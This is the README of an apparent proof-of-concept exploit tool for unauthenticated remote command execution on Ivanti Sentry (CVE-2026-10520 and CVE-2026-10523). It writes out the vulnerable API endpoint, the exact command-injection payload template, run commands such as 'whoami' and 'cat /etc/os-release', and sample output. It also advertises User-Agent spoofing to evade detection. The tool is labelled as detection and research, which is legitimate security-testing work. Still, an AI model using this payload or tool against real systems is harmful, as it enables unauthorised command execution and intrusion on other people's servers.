CVE-2026-10523 - Ivanti Sentry RCE Detection Tool

A comprehensive proof-of-concept detection tool for testing Ivanti Sentry vulnerabilities related to authentication bypass and remote code execution. This tool identifies systems vulnerable to CVE-2026-10520 and CVE-2026-10523.

Overview

This project is designed to detect and validate whether an Ivanti Sentry instance is vulnerable to critical authentication bypass and remote code execution flaws. The tool sends specially crafted messages through the Ivanti Sentry API endpoint to execute system commands and extract the results, allowing security researchers and penetration testers to identify vulnerable deployments.

Vulnerability Details

CVE-2026-10520

Authentication bypass vulnerability in Ivanti Sentry that allows unauthenticated access to restricted API endpoints.

CVE-2026-10523

Remote code execution vulnerability in Ivanti Sentry that permits execution of arbitrary system commands through the messaging API when combined with the authentication bypass.

Features

• Unauthenticated detection of vulnerable Ivanti Sentry instances
• System command execution capability for proof-of-concept validation
• Support for HTTP and HTTPS connections with TLS verification bypass
• Proxy support for testing through intermediaries
• Clean command output extraction from XML responses
• Safe error handling with informative feedback
• Configurable timeout and response size limits

Requirements

• Go 1.26.4 or higher
• Network access to the target Ivanti Sentry instance
• Valid target URL with protocol (HTTP or HTTPS)

Installation

Clone the repository and navigate to the project directory:

git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

Get init and package library

go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

Build the executable:

go build -o tot_poc tot_poc.go

Usage

The tool requires two mandatory parameters: target URL and command to execute.

Basic Usage

Run a simple command on the target:

./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

Command Line Options

• -url (required): Target base URL including protocol (e.g., https://127.0.0.1:8443)
• -cmd (required): Command to execute for vulnerability detection (e.g., "uname -a", "id", "whoami")
• -p or -proxy (optional): Proxy address and port for routing traffic (e.g., 127.0.0.1:8080)

Usage Examples

Detect vulnerability with simple system information command:

./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

Run with proxy configuration:

./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

Execute command to extract system information:

./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

Output

The tool will display:

1. A banner with vulnerability information
2. Target URL, command, and proxy configuration (if applicable)
3. Real-time status messages indicating request progress
4. Results of the command execution if the target is vulnerable
5. Error messages if the target is not vulnerable or connection fails

Successful Detection Output

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

Failed Detection Output

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.

Technical Details

Attack Vector

The tool exploits the /mics/api/v2/sentry/mics-config/handleMessage endpoint which is accessible without authentication. The payload is constructed as:

message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

The response contains the command output in XML format within a success tag.

Security Features

• TLS verification bypass for testing self-signed certificates
• Configurable HTTP timeouts to prevent hanging requests
• Response size limiting (10 MB) to prevent memory exhaustion
• Proper error handling for malformed responses
• User-Agent spoofing to avoid simple detection mechanisms

How It Works

1. Parse command-line arguments for target URL and command
2. Create HTTP client with optional proxy configuration
3. Construct payload with the user-provided command
4. Send POST request to the vulnerable endpoint
5. Extract command output from XML response structure
6. Display results or error messages accordingly

Disclaimer

This tool is provided for authorized security testing and research purposes only. Users are solely responsible for ensuring they have proper authorization before testing any systems. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse or damage caused by this tool.

Requirements and Limitations

• Target must be a vulnerable Ivanti Sentry instance
• Network connectivity to the target system is required
• Default timeout is 10 seconds per request
• Maximum response size is limited to 10 MB
• Only effective on systems running vulnerable versions of Ivanti Sentry
• TLS certificate validation is disabled for testing purposes

Author

GhostGTR666 - Gagaltotal666

Repository

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

License

This project is provided as-is for security research and educational purposes.

References

• CVE-2026-10520: Ivanti Sentry Authentication Bypass
• CVE-2026-10523: Ivanti Sentry Remote Code Execution